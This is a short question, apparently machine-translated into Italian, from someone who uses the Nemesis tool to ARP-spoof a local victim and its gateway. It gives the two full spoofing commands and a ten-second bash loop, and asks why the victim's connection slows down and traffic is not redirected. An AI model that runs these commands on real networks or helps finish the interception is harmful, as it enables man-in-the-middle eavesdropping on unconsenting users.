Ho utilizzato Nemesis 1.4 per testare lo spoofing ARP su una macchina locale vittima. Ho spoofing sia il computer della vittima che il gateway predefinito per il reindirizzamento ARP alla mia macchina.
MAC di origine della vittima dello spoofing:
sudo nemesis arp -v -r -d eth0 -S [victim IP] -D [default gateway IP] \
-h [my system MAC] -m [gateway MAC] -H [my MAC] -M [gateway MAC]
MAC di spoofing dei gateway:
sudo nemesis arp -v -r -d eth0 -S [gateway IP] -D [victim IP] \
-h [my system MAC] -m [victim MAC] -H [my MAC] -M [victim MAC]
Successivamente viene eseguito un BASH in loop e viene avviato il reindirizzamento ARP, spoofing ogni 10 secondi. In tcpdump posso vedere le risposte ARP uscire e sembra funzionare. Ma una volta sulla macchina delle vittime la connessione Internet diventa improvvisamente dolorosamente lenta, se funziona a tutti. Nemesis non sta reindirizzando? Se sì, cosa sto sbagliando?